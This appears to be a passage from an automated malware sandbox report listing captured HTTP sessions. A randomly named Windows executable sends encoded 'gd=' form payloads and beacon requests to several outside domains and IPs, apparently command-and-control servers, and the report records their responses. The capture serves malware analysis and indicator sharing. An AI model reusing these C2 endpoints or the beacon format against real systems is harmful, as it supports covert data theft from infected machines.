                  Data Ascii: gd=dNiLasFHVsc47eKNJBafD/xeabrEHcANv019k9ST9vz3Zo/hScRCds13ZuDLExSpdewheZMNHnB9vqn0Je9BSSVTPPT+YyUueV9oV2XlQPsspOkGCPrDZTVJTCXXb1Cggwr9ae9noSJLWS0ax6IK2wIESJXNAjbicb8dw/hDlTH6METFBA+OcR2+jJ1JOQSdmEyYNtZA/9YXSFc8vnItIaw=
                  Sep 14, 2024 11:11:59.884313107 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                  Content-Type: text/plain; charset=utf-8
                  Date: Sat, 14 Sep 2024 09:11:59 GMT
                  Content-Length: 11
                  Connection: close
                  Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                  Data Ascii: Bad Request


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  11 | 192.168.2.4 | 49748 | 103.42.108.46 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:12:01.554862022 CEST | 10892 | OUT | POST /yl6y/ HTTP/1.1
                  Host: www.independent200.org
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 10299
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.independent200.org
                  Referer: http://www.independent200.org/yl6y/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 37 65 4b 4e 4a 42 61 66 44 2f 78 65 61 62 72 45 48 63 41 4e 76 30 31 39 6b 39 53 54 39 76 72 33 59 61 33 68 51 2f 4a 43 63 73 31 33 48 2b 44 49 45 78 53 52 64 66 59 6c 65 5a 51 37 48 68 46 39 75 49 66 30 50 71 70 42 4c 69 56 54 58 50 54 7a 48 69 55 37 65 55 4e 57 56 32 48 6c 51 50 73 73 70 49 67 47 46 62 66 44 56 7a 56 4b 45 79 58 6c 51 56 43 59 67 30 2b 4b 61 65 70 64 6f 69 70 4c 57 32 55 61 2b 70 67 4b 72 41 49 38 56 4a 58 56 41 69 6e 48 63 62 77 6e 77 2f 46 6c 6c 56 37 36 4d 44 6d 66 46 6b 6e 54 64 51 4b 50 2b 4c 51 70 4f 44 37 66 67 31 36 58 63 64 74 6a 6a 4d 64 36 51 56 52 73 33 6e 59 75 4d 66 61 2f 74 68 35 53 45 48 52 41 61 50 34 4c 73 4a 4f 56 56 71 57 44 74 51 30 57 67 69 77 4e 50 7a 65 63 34 43 6b 56 6a 6a 41 6d 32 64 4b 48 68 69 7a 33 49 4d 41 57 33 39 56 4d 36 6e 53 44 77 32 32 55 73 6b 7a 4b 4e 4a 31 38 4c 39 74 6e 31 58 41 4c 4d 4a 39 56 36 30 61 50 38 30 32 77 45 61 45 59 4b 55 6d 6b 45 49 47 6a 6b 70 49 38 79 52 34 38 59 6c 4c 6f 43 33 56 [TRUNCATED]
                  Data Ascii: gd= [TRUNCATED]


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  12 | 192.168.2.4 | 49749 | 103.42.108.46 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:12:04.097100973 CEST | 516 | OUT | GET /yl6y/?gd=QPKrZbNCTa4h9OiZDCqTEYRHVYq8I9pQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+DVpCe+n8LSxyZkRiMUCXQdQdgo9ddvaEU2A=&a0=_6Edzvj0xtFLdH HTTP/1.1
                  Host: www.independent200.org
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Sep 14, 2024 11:12:04.990652084 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                  Content-Type: text/plain; charset=utf-8
                  Date: Sat, 14 Sep 2024 09:12:04 GMT
                  Content-Length: 11
                  Connection: close
                  Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                  Data Ascii: Bad Request


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  13 | 192.168.2.4 | 49750 | 3.33.130.190 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:12:10.665671110 CEST | 787 | OUT | POST /06rp/ HTTP/1.1
                  Host: www.tigre777gg.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 199
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.tigre777gg.online
                  Referer: http://www.tigre777gg.online/06rp/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 76 35 67 56 72 6c 4e 6b 34 6b 67 42 49 39 62 79 75 53 76 46 61 46 6c 61 6c 76 6c 46 78 76 44 52 7a 54 52 5a 4b 42 69 31 69 2f 37 43 4c 6e 63 57 67 59 7a 4c 65 47 43 5a 43 7a 32 41 6d 64 6b 6a 6e 66 48 50 74 69 4e 55 55 51 31 2f 42 66 6a 6a 65 6e 4c 53 6e 66 4b 4d 55 4e 62 38 76 47 41 58 63 38 54 35 37 4a 64 36 33 54 41 44 53 31 2f 57 39 6d 56 37 6d 6d 76 64 4e 38 53 76 30 73 2b 68 75 44 66 67 44 6d 66 68 6d 6e 55 42 35 35 65 64 62 52 38 77 52 63 34 46 59 34 4a 65 36 39 4b 77 6e 49 4a 64 50 4a 7a 77 38 47 4b 66 4f 52 72 65 77 4c 4c 79 51 3d 3d
                  Data Ascii: gd=+gx9o4ylIYGL+v5gVrlNk4kgBI9byuSvFaFlalvlFxvDRzTRZKBi1i/7CLncWgYzLeGCZCz2AmdkjnfHPtiNUUQ1/BfjjenLSnfKMUNb8vGAXc8T57Jd63TADS1/W9mV7mmvdN8Sv0s+huDfgDmfhmnUB55edbR8wRc4FY4Je69KwnIJdPJzw8GKfORrewLLyQ==


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  14 | 192.168.2.4 | 49751 | 3.33.130.190 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:12:13.210875988 CEST | 807 | OUT | POST /06rp/ HTTP/1.1
                  Host: www.tigre777gg.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 219
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.tigre777gg.online
                  Referer: http://www.tigre777gg.online/06rp/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 4d 68 67 5a 71 6c 4e 68 59 6b 68 64 59 39 62 38 4f 54 6d 46 61 42 6c 61 6e 44 4c 45 44 4c 44 51 52 37 52 59 4c 42 69 35 43 2f 37 61 62 6e 64 62 41 59 34 4c 65 61 67 5a 44 2f 32 41 6d 68 6b 6a 6a 58 48 50 61 32 4f 55 45 51 33 71 52 66 68 38 4f 6e 4c 53 6e 66 4b 4d 55 70 78 38 76 4f 41 58 4e 4d 54 37 5a 68 61 6b 6e 54 44 58 43 31 2f 53 39 6d 5a 37 6d 6e 34 64 50 59 38 76 77 63 2b 68 73 4c 66 68 57 4b 59 30 57 6e 61 50 5a 34 41 64 4c 35 77 34 78 42 77 44 62 30 64 42 70 35 61 38 42 5a 54 4d 2b 6f 6b 69 38 69 35 43 4a 59 66 54 7a 32 43 70 52 44 6c 4f 4f 6d 49 75 35 6d 6d 33 30 6b 73 52 62 62 57 6a 56 38 3d
                  Data Ascii: gd=+gx9o4ylIYGL+MhgZqlNhYkhdY9b8OTmFaBlanDLEDLDQR7RYLBi5C/7abndbAY4LeagZD/2AmhkjjXHPa2OUEQ3qRfh8OnLSnfKMUpx8vOAXNMT7ZhaknTDXC1/S9mZ7mn4dPY8vwc+hsLfhWKY0WnaPZ4AdL5w4xBwDb0dBp5a8BZTM+oki8i5CJYfTz2CpRDlOOmIu5mm30ksRbbWjV8=


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  15 | 192.168.2.4 | 49752 | 3.33.130.190 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:12:15.766053915 CEST | 10889 | OUT | POST /06rp/ HTTP/1.1
                  Host: www.tigre777gg.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 10299
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.tigre777gg.online
                  Referer: http://www.tigre777gg.online/06rp/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 4d 68 67 5a 71 6c 4e 68 59 6b 68 64 59 39 62 38 4f 54 6d 46 61 42 6c 61 6e 44 4c 45 44 44 44 51 69 44 52 5a 73 39 69 34 43 2f 37 54 37 6e 59 62 41 59 6c 4c 65 53 6b 5a 44 6a 6d 41 6a 74 6b 68 45 58 48 4a 6f 4f 4f 4e 30 51 33 6f 52 66 6b 6a 65 6d 52 53 6e 50 4f 4d 55 5a 78 38 76 4f 41 58 4f 55 54 79 72 4a 61 6d 6e 54 41 44 53 31 6a 57 39 6d 39 37 6d 66 6f 64 50 63 43 73 42 67 2b 69 50 6a 66 6d 67 2b 59 32 32 6e 50 4d 5a 34 49 64 4c 6b 75 34 78 74 57 44 59 6f 33 42 75 78 61 76 6c 55 76 5a 38 6b 4e 78 64 4f 62 59 34 35 39 53 67 43 43 69 69 58 6a 65 2f 2b 6a 34 49 65 50 2f 54 64 34 4e 36 4b 56 38 69 66 45 61 34 59 32 44 35 4e 30 68 62 59 70 73 65 32 4f 39 43 41 66 5a 37 73 67 6b 66 46 45 4f 6f 78 73 48 71 65 77 4a 45 4d 53 78 59 6a 64 47 39 79 77 71 50 5a 45 72 41 39 39 41 41 64 69 4e 34 6b 4b 48 45 59 4a 6a 4d 76 5a 41 36 65 6d 42 31 5a 70 51 39 36 47 78 43 70 64 64 72 52 45 6d 4d 53 61 6e 31 71 71 51 41 59 33 35 4c 4d 37 31 6a 33 57 55 64 6a 55 6e 4e 35 [TRUNCATED]
                  Data Ascii: gd= [TRUNCATED]


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  16 | 192.168.2.4 | 49753 | 3.33.130.190 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:12:18.305566072 CEST | 515 | OUT | GET /06rp/?gd=ziZdrN3wZJ2qpMxAfrlPkqpeB+M36+P6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYcz8nolH3weaQT2LRQ2gsiM78APZpluIu/QY=&a0=_6Edzvj0xtFLdH HTTP/1.1
                  Host: www.tigre777gg.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Sep 14, 2024 11:12:18.771275997 CEST | 396 | IN | HTTP/1.1 200 OK
                  Server: openresty
                  Date: Sat, 14 Sep 2024 09:12:18 GMT
                  Content-Type: text/html
                  Content-Length: 256
                  Connection: close
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 64 3d 7a 69 5a 64 72 4e 33 77 5a 4a 32 71 70 4d 78 41 66 72 6c 50 6b 71 70 65 42 2b 4d 33 36 2b 50 36 41 65 5a 59 41 6e 66 6e 43 44 54 51 64 6a 6a 52 59 37 34 49 73 53 65 70 44 49 62 50 5a 78 30 74 43 75 66 70 53 52 72 33 43 41 78 57 30 79 58 6e 4b 6f 53 59 63 7a 38 6e 6f 6c 48 33 77 65 61 51 54 32 4c 52 51 32 67 73 69 4d 37 38 41 50 5a 70 6c 75 49 75 2f 51 59 3d 26 61 30 3d 5f 36 45 64 7a 76 6a 30 78 74 46 4c 64 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gd=ziZdrN3wZJ2qpMxAfrlPkqpeB+M36+P6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYcz8nolH3weaQT2LRQ2gsiM78APZpluIu/QY=&a0=_6Edzvj0xtFLdH"}</script></head></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  17 | 192.168.2.4 | 49754 | 199.59.243.226 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:12:32.041430950 CEST | 802 | OUT | POST /wwak/ HTTP/1.1
                  Host: www.personal-loans-jp8.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 199
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.personal-loans-jp8.xyz
                  Referer: http://www.personal-loans-jp8.xyz/wwak/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 4a 31 37 6d 71 31 56 73 79 41 52 4f 4e 66 61 44 42 62 37 4e 76 69 4b 7a 35 2f 4a 48 56 4e 46 51 69 62 76 6d 50 67 6e 57 32 44 74 4f 70 42 56 4d 4d 6c 6b 4e 6e 63 77 38 56 4f 31 79 33 63 42 4a 36 72 71 54 68 44 77 4f 30 50 4a 75 38 61 7a 65 46 41 46 31 52 6e 39 4b 4b 6e 42 41 53 33 31 49 71 51 4f 57 4f 5a 45 77 38 68 2b 30 73 39 37 43 56 59 62 59 48 42 33 4c 69 75 72 7a 36 43 47 36 72 65 6f 53 58 45 55 54 38 68 6f 2f 41 6c 41 4d 30 70 65 66 52 55 46 63 65 64 4b 51 71 48 73 6f 67 78 6a 50 6a 34 36 6d 7a 6c 6c 69 4c 44 36 56 65 6b 72 33 46 6c 6b 39 57 50 6c 6c 39 62 67 33 61 67 3d 3d
                  Data Ascii: gd=J17mq1VsyARONfaDBb7NviKz5/JHVNFQibvmPgnW2DtOpBVMMlkNncw8VO1y3cBJ6rqThDwO0PJu8azeFAF1Rn9KKnBAS31IqQOWOZEw8h+0s97CVYbYHB3Liurz6CG6reoSXEUT8ho/AlAM0pefRUFcedKQqHsogxjPj46mzlliLD6Vekr3Flk9WPll9bg3ag==
                  Sep 14, 2024 11:12:32.485328913 CEST | 1236 | IN | HTTP/1.1 200 OK
                  date: Sat, 14 Sep 2024 09:12:32 GMT
                  content-type: text/html; charset=utf-8
                  content-length: 1154
                  x-request-id: bb2eeeab-249a-437a-ad87-0b248c9b00aa
                  cache-control: no-store, max-age=0
                  accept-ch: sec-ch-prefers-color-scheme
                  critical-ch: sec-ch-prefers-color-scheme
                  vary: sec-ch-prefers-color-scheme
                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==
                  set-cookie: parking_session=bb2eeeab-249a-437a-ad87-0b248c9b00aa; expires=Sat, 14 Sep 2024 09:27:32 GMT; path=/
                  connection: close
                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 39 43 49 45 47 6c 38 49 51 43 33 73 5a 5a 74 4a 66 55 78 6e 54 45 45 6a 38 30 4d 39 2f 45 2f 6a 5a 75 64 7a 56 70 6d 77 4b 55 34 72 37 30 6f 73 65 6c 74 73 44 74 32 6a 55 32 6f 4a 50 76 6c 77 54 39 67 30 71 56 32 49 73 38 4a 38 42 67 66 70 62 76 79 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                  Sep 14, 2024 11:12:32.486071110 CEST | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmIyZWVlYWItMjQ5YS00MzdhLWFkODctMGIyNDhjOWIwMGFhIiwicGFnZV90aW1lIjoxNzI2MzA1MT


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  18 | 192.168.2.4 | 49755 | 199.59.243.226 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:12:34.589665890 CEST | 822 | OUT | POST /wwak/ HTTP/1.1
                  Host: www.personal-loans-jp8.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 219
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.personal-loans-jp8.xyz
                  Referer: http://www.personal-loans-jp8.xyz/wwak/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 4a 31 37 6d 71 31 56 73 79 41 52 4f 4e 2f 71 44 44 34 54 4e 70 43 4b 30 6b 50 4a 48 43 64 46 55 69 62 54 6d 50 68 53 54 33 78 35 4f 6f 6b 70 4d 65 52 49 4e 67 63 77 38 65 75 30 34 34 38 42 43 36 72 58 6d 68 42 30 4f 30 4f 70 75 38 62 44 65 46 33 78 32 51 33 39 55 48 48 41 47 57 33 31 49 71 51 4f 57 4f 64 70 72 38 6c 53 30 73 4e 4c 43 55 35 62 58 4a 68 33 49 6c 75 72 7a 2b 43 47 45 72 65 6f 38 58 41 30 39 38 69 51 2f 41 67 38 4d 30 59 65 63 59 55 46 67 61 64 4c 56 76 6b 56 42 68 53 65 35 70 65 32 66 39 6c 31 46 4b 46 72 50 50 56 4b 67 58 6c 41 4f 4c 49 73 52 77 59 64 2b 42 73 79 46 78 77 4a 68 33 57 6b 30 61 78 42 59 38 48 4c 41 52 52 45 3d
                  Data Ascii: gd=J17mq1VsyARON/qDD4TNpCK0kPJHCdFUibTmPhST3x5OokpMeRINgcw8eu0448BC6rXmhB0O0Opu8bDeF3x2Q39UHHAGW31IqQOWOdpr8lS0sNLCU5bXJh3Ilurz+CGEreo8XA098iQ/Ag8M0YecYUFgadLVvkVBhSe5pe2f9l1FKFrPPVKgXlAOLIsRwYd+BsyFxwJh3Wk0axBY8HLARRE=
                  Sep 14, 2024 11:12:35.042042017 CEST | 1236 | IN | HTTP/1.1 200 OK
                  date: Sat, 14 Sep 2024 09:12:34 GMT
                  content-type: text/html; charset=utf-8
                  content-length: 1154
                  x-request-id: 7b2e3516-2ff4-48b7-98a0-0e14c0bdab98
                  cache-control: no-store, max-age=0
                  accept-ch: sec-ch-prefers-color-scheme
                  critical-ch: sec-ch-prefers-color-scheme
                  vary: sec-ch-prefers-color-scheme
                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==
                  set-cookie: parking_session=7b2e3516-2ff4-48b7-98a0-0e14c0bdab98; expires=Sat, 14 Sep 2024 09:27:34 GMT; path=/
                  connection: close
                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 39 43 49 45 47 6c 38 49 51 43 33 73 5a 5a 74 4a 66 55 78 6e 54 45 45 6a 38 30 4d 39 2f 45 2f 6a 5a 75 64 7a 56 70 6d 77 4b 55 34 72 37 30 6f 73 65 6c 74 73 44 74 32 6a 55 32 6f 4a 50 76 6c 77 54 39 67 30 71 56 32 49 73 38 4a 38 42 67 66 70 62 76 79 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                  Sep 14, 2024 11:12:35.042124987 CEST | 607 | IN
                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2IyZTM1MTYtMmZmNC00OGI3LTk4YTAtMGUxNGMwYmRhYjk4IiwicGFnZV90aW1lIjoxNzI2MzA1MT


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  19 | 192.168.2.4 | 49756 | 199.59.243.226 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:12:37.130942106 CEST | 10904 | OUT | POST /wwak/ HTTP/1.1
                  Host: www.personal-loans-jp8.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 10299
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.personal-loans-jp8.xyz
                  Referer: http://www.personal-loans-jp8.xyz/wwak/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Sep 14, 2024 11:12:37.821768999 CEST | 1236 | IN | HTTP/1.1 200 OK
                  date: Sat, 14 Sep 2024 09:12:37 GMT
                  content-type: text/html; charset=utf-8
                  content-length: 1154
                  x-request-id: 81a2126a-1501-4e07-b5d7-19b0cb44ef59
                  cache-control: no-store, max-age=0
                  accept-ch: sec-ch-prefers-color-scheme
                  critical-ch: sec-ch-prefers-color-scheme
                  vary: sec-ch-prefers-color-scheme
